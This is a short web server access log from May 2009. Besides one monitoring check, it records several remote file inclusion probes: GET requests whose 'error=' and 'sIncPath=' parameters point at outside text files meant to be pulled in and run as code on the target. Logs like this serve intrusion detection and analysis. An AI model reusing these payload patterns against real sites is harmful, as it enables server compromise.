77.221.130.2 - - [16/May/2009:01:50:07 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:01:51:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.246.39.167 - - [16/May/2009:01:51:35 -0400] "GET //?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:01:51:44 -0400] "GET /logs//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
213.246.39.167 - - [16/May/2009:01:51:44 -0400] "GET /logs/access_log.Q109031500//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
